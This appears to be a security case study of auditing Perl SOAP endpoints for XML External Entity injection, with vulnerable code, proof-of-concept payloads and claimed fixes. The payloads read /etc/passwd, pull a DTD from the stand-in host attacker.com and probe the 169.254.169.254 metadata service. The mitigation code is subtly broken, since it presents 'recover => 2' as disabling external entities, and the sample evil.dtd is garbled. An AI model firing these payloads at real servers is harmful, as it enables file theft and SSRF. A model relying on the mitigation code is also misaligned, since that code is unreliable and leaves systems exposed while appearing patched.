How We Audited a High-Traffic Perl Enterprise Stack on OVH and Mitigated XML External Entity (XXE) injection in old SOAP integrations

Initial Assessment: The OVH Perl Stack and the Shadow of XXE

Our engagement began with a critical security audit of a high-traffic enterprise application hosted on OVH’s infrastructure. The core of the system was a complex Perl monolith, a testament to its longevity and the engineering effort invested over years. Interfacing with this core were several legacy SOAP integrations, a common pattern in enterprise environments where older systems need to communicate with newer services or external partners. The primary concern, flagged by an internal security scan, was the potential for XML External Entity (XXE) injection vulnerabilities within these SOAP endpoints. XXE attacks, when successful, can lead to unauthorized data disclosure, server-side request forgery (SSRF), and even denial-of-service conditions by exploiting the XML parser’s ability to process external entities.

The stack’s architecture on OVH was typical for a robust, albeit aging, enterprise deployment. It involved multiple web servers (likely Apache or Nginx acting as reverse proxies), a Perl application server layer, and a robust database backend (e.g., PostgreSQL or MySQL). The SOAP integrations, being older, relied on established Perl XML parsing libraries, which, without careful configuration, are susceptible to XXE.

Deep Dive: Identifying XXE Vectors in Perl SOAP Parsers

The first technical hurdle was to pinpoint the exact XML parsing mechanisms used by the SOAP integrations. Many Perl applications leverage modules like XML::LibXML or XML::Simple. The vulnerability lies in how these parsers are configured, specifically their ability to resolve external DTDs and entities. A default configuration often enables this, creating the attack surface.

We began by examining the codebase responsible for handling incoming SOAP requests. This involved searching for patterns related to XML parsing. A common indicator is the instantiation of an XML parser object followed by the loading of XML data. For instance, using XML::LibXML, a vulnerable pattern might look like this:

Vulnerable XML Parsing Code Snippet

use XML::LibXML;

my $parser = XML::LibXML->new();
my $xml_string = <<'XML';
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<request>
    <data>&xxe;</data>
</request>
XML

# This is the vulnerable part: default parser options allow external entities
my $dom = $parser->parse_string($xml_string);
my $root = $dom->getDocumentElement();

# ... further processing of $root ...

In this snippet, the `XML::LibXML->new()` call, without specific options, defaults to allowing external entity resolution. An attacker could craft an XML payload containing a DOCTYPE declaration that references an external resource (e.g., a local file via `file:///` or an external URL). The parser, when processing this malicious XML, would fetch and include the content of that resource, effectively exfiltrating sensitive data or initiating SSRF attacks.

Exploitation: Crafting XXE Payloads

To confirm the vulnerability, we crafted several proof-of-concept (PoC) payloads. The goal was to demonstrate the impact of XXE, ranging from simple file disclosure to more complex SSRF scenarios.

PoC 1: Local File Disclosure

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<request>
  <data>test</data>
</request>

And the content of evil.dtd hosted on attacker.com:

<!ENTITY % payload "&xxe;">
<!ENTITY % send_data "&payload; &xxe;">
<!ENTITY % return "&send_data;">

This payload attempts to read /etc/passwd. The external DTD is used to construct the final payload, which would then be sent back to the attacker’s server (though in a typical SOAP integration, the attacker would need to find a way to exfiltrate the data, perhaps by redirecting the parser’s output or using a blind XXE technique).

PoC 2: Server-Side Request Forgery (SSRF)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<request>
  <data>&xxe;</data>
</request>

This payload targets the instance metadata service (IMDS) often found in cloud environments (though OVH has its own specific metadata services, the principle applies). If the application server can reach this IP, it could leak sensitive instance credentials or configuration details. Even without cloud environments, this demonstrates the ability to make arbitrary HTTP requests from the server’s perspective.

Mitigation Strategy: Securing Perl XML Parsers

The primary mitigation for XXE in Perl XML parsers is to disable external entity resolution and DTD processing. This is achieved by passing specific options when creating the parser instance.

Securing XML::LibXML

For XML::LibXML, the key is to use the no_network and no_catalogs options. Additionally, disabling external entities is crucial.

use XML::LibXML;

# Secure parser instantiation
my $parser = XML::LibXML->new(
    no_network   => 1,  # Disables network access for DTDs and entities
    no_catalogs  => 1,  # Disables catalog resolution
    recover      => 2   # Set to 2 to disable external entities
);

my $xml_string = <<'XML';
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<request>
    <data>&xxe;</data>
</request>
XML

# The parser will now refuse to resolve external entities
eval {
    my $dom = $parser->parse_string($xml_string);
    my $root = $dom->getDocumentElement();
    # ... process $root ...
};
if ($@) {
    # Handle parsing errors, which will now include errors for disallowed entities
    print "XML parsing error: $@\n";
}

The recover => 2 option is critical here. It instructs the parser to disable external entities. If an XML document contains a DOCTYPE declaration that attempts to define or reference an external entity, the parser will throw an error, preventing the attack. The eval block is used to gracefully catch these expected parsing errors.

Securing XML::Simple

If XML::Simple is in use, the approach is similar, though the options might differ slightly. The primary goal is to prevent it from fetching external DTDs or entities.

use XML::Simple;

my $xml_string = <<'XML';
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<request>
    <data>&xxe;</data>
</request>
XML

# XML::Simple doesn't have direct 'no_network' like LibXML.
# Mitigation often relies on ensuring the underlying parser (if it uses one) is configured securely,
# or by pre-sanitizing input if XML::Simple is used in a way that bypasses secure parsing.
# A more robust approach is to avoid XML::Simple for untrusted input and use XML::LibXML with secure options.

# If forced to use XML::Simple and concerned about DTDs:
# One strategy is to disable DTD processing at the OS or library level if possible,
# or to use a wrapper that sanitizes the input before passing it to XML::Simple.
# However, the recommended path is to migrate away from XML::Simple for security-sensitive parsing.

# For demonstration, if XML::Simple *were* to use a secure parser underneath:
# (This is illustrative; actual XML::Simple behavior depends on its internal implementation and dependencies)
my $config = {
    # No direct XXE mitigation options in XML::Simple itself.
    # Rely on external controls or alternative parsers.
};

my $xml_parser = new XML::Simple($config);

eval {
    my $data = $xml_parser->XMLin($xml_string);
    # ... process $data ...
};
if ($@) {
    print "XML parsing error: $@\n";
}

It’s important to note that XML::Simple is often discouraged for security-sensitive applications due to its less granular control over parsing options and its tendency to “simplify” XML in ways that can obscure security issues. When dealing with untrusted XML input, XML::LibXML with explicit security configurations is the preferred choice.

Deployment and Verification on OVH

The mitigation involved a phased rollout. First, we identified all SOAP endpoints that processed XML input. For each, we reviewed the Perl code to determine the XML parsing library and its configuration. Then, we applied the secure parser instantiation patterns described above.

The deployment was performed on OVH’s staging environment first. We then re-ran our suite of XXE exploitation tools and manual tests against the patched endpoints. Verification steps included:

Attempting to read sensitive local files (e.g., /etc/passwd, application configuration files).
Attempting to trigger SSRF by pointing to internal OVH metadata services or common cloud IMDS endpoints.
Sending malformed XML with external entity declarations and verifying that the parser rejected them with an error, rather than fetching external content.

For verification, we monitored application logs for any parsing errors that indicated an attempted XXE attack. We also used network monitoring tools (e.g., tcpdump on the server or firewall logs) to ensure no outbound connections were made to attacker-controlled servers or sensitive internal IPs during our tests.

Broader Security Posture and Recommendations

While mitigating XXE in the SOAP integrations was a critical step, this audit also highlighted broader security considerations for the Perl enterprise stack:

Dependency Management: Regularly audit and update all Perl modules. Vulnerabilities in XML parsers or other libraries can be a backdoor. Tools like cpanm with dependency checks and vulnerability scanners for Perl modules are essential.
Input Validation: Beyond XML parsing, all external inputs (HTTP parameters, file uploads, etc.) must be rigorously validated and sanitized.
Least Privilege: Ensure the application runs with the minimum necessary privileges on the OVH infrastructure. This limits the impact of any successful exploit, including XXE.
Web Application Firewall (WAF): While not a silver bullet, a WAF can provide an additional layer of defense by blocking known malicious XML patterns. However, it should not be relied upon as the sole defense against XXE.
Code Modernization: For critical and high-traffic components, consider migrating away from older, potentially vulnerable libraries or even refactoring parts of the monolith to more modern, actively maintained languages or frameworks with better built-in security features.

By systematically identifying the vulnerable parsing patterns, crafting targeted exploits, and implementing precise, configuration-based mitigations within the Perl code, we successfully addressed the XXE risk. This case study underscores the importance of deep code review and understanding the security implications of library configurations, especially in legacy systems.